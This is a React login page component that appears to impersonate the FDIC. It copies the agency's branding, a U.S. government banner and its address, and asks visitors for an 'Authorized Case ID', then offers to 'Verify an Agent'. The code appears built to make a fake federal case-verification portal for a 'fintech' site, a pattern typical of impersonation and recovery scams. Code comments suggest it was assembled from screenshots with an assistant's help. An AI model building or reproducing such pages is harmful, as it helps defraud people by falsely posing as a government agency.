import React, { useState } from 'react';
import { Link, useNavigate } from 'react-router-dom';
import api from '../../services/api';

/* ---------- FDIC top strip ---------- */

const FdicTopBar = () => (
  <div className="bg-[#1a1a1a] text-white">
    <div className="max-w-5xl mx-auto px-4 py-3 flex items-center gap-4">
      <div className="flex flex-col leading-none">
        <span className="text-[22px] font-black tracking-tight">FDIC</span>
        <span className="text-[8px] tracking-[0.15em] text-white/70">
          FEDERAL DEPOSIT INSURANCE CORPORATION
        </span>
      </div>
      <span className="hidden sm:block text-[9px] tracking-[0.15em] text-white/50 border-l border-white/20 pl-4">
        INSURED INSTITUTION PORTAL
      </span>
    </div>
    <div className="max-w-5xl mx-auto px-4 pb-2 flex gap-6 text-[10px] tracking-[0.18em] text-white/70 uppercase">
      <a href="#" className="hover:text-white">About</a>
      <a href="#" className="hover:text-white">Resources</a>
      <a href="#" className="hover:text-white">Analysis</a>
      <a href="#" className="hover:text-white">News</a>
    </div>
  </div>
);

/* ---------- Gov banner ---------- */

const GovBanner = () => (
  <div className="bg-gray-100 border-b border-gray-200 text-[12px] text-gray-700">
    <div className="max-w-5xl mx-auto px-4 py-2 flex items-center gap-2">
      <span aria-hidden="true">🇺🇸</span>
      <span>An official website of the United States government</span>
    </div>
  </div>
);

/* ---------- Navy header ---------- */

const FdicHeader = () => (
  <header className="bg-[#0b2740] text-white">
    <div className="max-w-5xl mx-auto px-4 py-4">
      <div className="flex flex-col leading-none">
        <span className="text-[34px] font-black tracking-tight">FDIC</span>
        <span className="text-[9px] tracking-[0.15em] text-white/70 mt-1">
          FEDERAL DEPOSIT INSURANCE CORPORATION
        </span>
        <span className="text-[8px] tracking-[0.15em] text-white/50 mt-0.5">
          INSURED INSTITUTION PORTAL
        </span>
      </div>
    </div>
    <div className="max-w-5xl mx-auto px-4 pb-3 flex gap-6 text-[11px] tracking-[0.18em] text-white/80 uppercase border-t border-white/10 pt-3">
      <a href="#" className="hover:text-white">About</a>
      <a href="#" className="hover:text-white">Resources</a>
      <a href="#" className="hover:text-white">Analysis</a>
      <a href="#" className="hover:text-white">News</a>
    </div>
  </header>
);

/* ---------- Loader (second image) ---------- */

const SearchingRecords = () => (
  <div className="bg-white rounded-lg shadow-sm border border-gray-200 overflow-hidden">
    <div className="bg-[#0b2740] text-white px-5 py-4 flex items-center gap-3">
      <svg viewBox="0 0 24 24" fill="none" className="w-4 h-4" aria-hidden="true">
        <circle cx="11" cy="11" r="6" stroke="currentColor" strokeWidth="1.8" />
        <path d="M16 16l4 4" stroke="currentColor" strokeWidth="1.8" strokeLinecap="round" />
      </svg>
      <span className="text-[12px] font-semibold tracking-[0.2em] uppercase">
        Searching Records
      </span>
    </div>
    <div className="py-16 flex flex-col items-center gap-6">
      <div className="w-12 h-12 rounded-full border-[3px] border-[#0b2740]/20 border-t-[#0b2740] animate-spin" />
      <p className="text-[14px] text-gray-600">Verifying your information…</p>
    </div>
  </div>
);

/* ---------- Page ---------- */

const FintechLogin = () => {
  const [caseId, setCaseId] = useState('');
  const [loading, setLoading] = useState(false);
  const [error, setError] = useState('');
  const navigate = useNavigate();

  /*const submit = async (e) => {
    e.preventDefault();
    setError('');
    try {
      setLoading(true);
      //const res = await api.post('/fintech/verify', { caseId });
      const res = await api.post('/fintech/login', { caseNumber: caseId });
      // Adjust the redirect target once you tell me what the API returns.
      // If it returns an agent record, route to the agent detail page:
      //   navigate(`/fintech/agent/${res.data.id}`);
      // If it returns a verification token, store it and continue:
      //   localStorage.setItem('fintech_verify', res.data.token);
      //   navigate('/fintech/verified');
      navigate('/fintech/verified', { state: { caseId, data: res.data } });
    } catch (err) {
      console.error(err);
      setError(
        err?.response?.data?.message ||
        'We could not find a case matching that ID. Please check the number and try again.'
      );
      setLoading(false);
    }
  };*/

  const submit = async (e) => {
  e.preventDefault();
  setError('');
  try {
    setLoading(true);
    const res = await api.post('/fintech/login', { caseNumber: caseId.trim() });
    const { token } = res.data;

    // Store under the fintech-specific key
    localStorage.setItem('fintech_token', token);
    // stash display info for the layout drawer
    // (caseNumber is in the JWT payload — decode it or use the user's input)
    localStorage.setItem('fintech_caseNumber', caseId.trim().toUpperCase());
    //navigate('/fintech/dashboard');
    navigate('/fintech/verification');
  } catch (err) {
    console.error(err);
    setError(
      err?.response?.data?.message ||
      'We could not find a case matching that ID. Please check the number and try again.'
    );
    setLoading(false);
  }
};

  return (
    <div className="min-h-screen flex flex-col bg-white">
      <FdicTopBar />
      <GovBanner />
      <FdicHeader />

      <main className="flex-1 bg-white">
        <div className="max-w-3xl mx-auto px-4 py-10">
          {loading ? (
            <SearchingRecords />
          ) : (
            <div className="border border-gray-200 rounded-lg overflow-hidden shadow-sm">
              {/* Navy card header */}
              <div className="bg-[#0b2740] h-12" />

              <div className="p-6 sm:p-8">
                {/* Back link */}
                <Link
                  to="/fintech"
                  className="inline-flex items-center gap-2 text-[14px] text-[#1a4b8c] hover:underline"
                >
                  <svg viewBox="0 0 24 24" fill="none" className="w-4 h-4" aria-hidden="true">
                    <path d="M14 6l-6 6 6 6" stroke="currentColor" strokeWidth="1.8" strokeLinecap="round" strokeLinejoin="round" />
                  </svg>
                  Back to FDIC homepage
                </Link>

                {/* Title */}
                <h1 className="mt-6 font-serif text-[28px] text-[#1a2b3c]">
                  Case Verification
                </h1>
                <p className="mt-2 text-[14px] text-gray-600">
                  Enter your unique Case ID to access secure records.
                </p>

                {/* Tabs — User Login intentionally removed.
                    If you ever want it back, render this row and
                    conditionally switch the form below:

                    <div className="mt-6 grid grid-cols-2 gap-2 bg-gray-100 p-1 rounded-lg">
                      <button className="bg-white shadow rounded-md py-2 text-[14px] font-medium">
                        Case ID
                      </button>
                      <button className="py-2 text-[14px] text-gray-600">
                        User Login
                      </button>
                    </div>
                */}

                {/* Form */}
                <form onSubmit={submit} className="mt-8">
                  <label
                    htmlFor="caseId"
                    className="block text-[12px] font-semibold tracking-[0.12em] uppercase text-gray-700"
                  >
                    Authorized Case ID
                  </label>
                  <input
                    id="caseId"
                    type="text"
                    value={caseId}
                    onChange={(e) => setCaseId(e.target.value)}
                    placeholder="e.g. FDIC-2026-54427"
                    required
                    className="mt-2 w-full border border-gray-300 rounded-md px-4 py-3 text-[14px] text-gray-800 placeholder:text-gray-400 focus:outline-none focus:ring-2 focus:ring-[#0b2740]/30 focus:border-[#0b2740]"
                  />

                  {error && (
                    <p className="mt-3 text-[13px] text-red-600">{error}</p>
                  )}

                  <button
                    type="submit"
                    className="mt-6 w-full bg-[#0b2740] hover:bg-[#12324f] text-white text-[13px] font-semibold tracking-[0.15em] uppercase py-3.5 rounded-md transition-colors"
                  >
                    Verify Case ID
                  </button>
                </form>

                {/* Secondary CTA */}
                <div className="mt-6 text-center">
                  <Link
                    to="/fintech/verify-agent"
                    className="inline-flex items-center gap-2 text-[14px] text-[#1a4b8c] hover:underline"
                  >
                    Verify an Agent
                    <svg viewBox="0 0 24 24" fill="none" className="w-4 h-4" aria-hidden="true">
                      <path d="M5 12h14M13 6l6 6-6 6" stroke="currentColor" strokeWidth="1.8" strokeLinecap="round" strokeLinejoin="round" />
                    </svg>
                  </Link>
                </div>
              </div>
            </div>
          )}
        </div>
      </main>

      {/* Footer */}
      <footer className="bg-[#0b2740] text-white">
        <div className="max-w-5xl mx-auto px-4 py-6 text-center">
          <p className="text-[11px] text-white/70 leading-5">
            Federal Deposit Insurance Corporation — 550 17th Street NW, Washington, D.C. 20429
          </p>
          <div className="mt-3 flex flex-wrap justify-center gap-x-6 gap-y-2 text-[11px] tracking-[0.1em] text-white/70">
            <a href="#" className="hover:text-white">FDIC.gov</a>
            <a href="#" className="hover:text-white">Contact the FDIC</a>
            <a href="#" className="hover:text-white">FOIA</a>
            <a href="#" className="hover:text-white">Privacy Policy</a>
            <a href="#" className="hover:text-white">Accessibility</a>
          </div>
        </div>
      </footer>
    </div>
  );
};

export default FintechLogin;